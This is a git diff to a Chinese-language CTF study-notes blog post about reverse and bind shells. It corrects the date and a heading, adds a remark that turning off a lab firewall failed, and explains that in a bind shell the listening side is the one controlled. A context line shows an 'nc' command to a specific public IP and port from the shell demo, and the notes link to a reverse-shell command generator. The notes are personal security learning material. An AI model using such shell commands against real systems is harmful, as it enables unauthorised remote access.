记录本体项目代码修改部分

--- a/docs/views/numerology/2025-01-09-CTFLearn.md
+++ b/docs/views/numerology/2025-01-09-CTFLearn.md
@@ -1,6 +1,6 @@
 ---
-title: 20250108CTF学习笔记35
-date: 2025-01-08
+title: 20250109CTF学习笔记35
+date: 2025-01-09
 tags:
  - CTF
  - CTFLearn
@@ -71,7 +71,7 @@ Windows Server 2012 + 【[棱角社区文件下载命令生成工具](https://fo
 
 ## 反弹Shell
 
-## 使用场景：
+### 使用场景：
 
 如果我们需要到服务器上执行 Shell 命令，但是因为防火墙等原因，无法由客户端主动发起连接的情况，就可以使用反弹 Shell 来满足登陆和操作的需求。
 
@@ -154,7 +154,11 @@ Windows Server 2012 + 【[棱角社区反弹Shell工具](https://forum.ywhack.co
    nc 47.94.236.117 5566
    ```
 
-   在复现时发现我在Vmware安装的Centos系统不能用Windows连接，查阅资料发现应该是防火墙问题
+   在复现时发现我在Vmware安装的Centos系统不能用Windows连接，查阅资料发现应该是防火墙问题，尝试关闭Linux系统的防火墙失败，理论上是可行的。
 
-   
 
+**正向连接原理：**
+
+- 本地监听，等待连接
+- 正向连接是谁监听，就是控制谁
+- ![image-20250110200957400](/img/ctfLearn/image-20250110200957400.png)
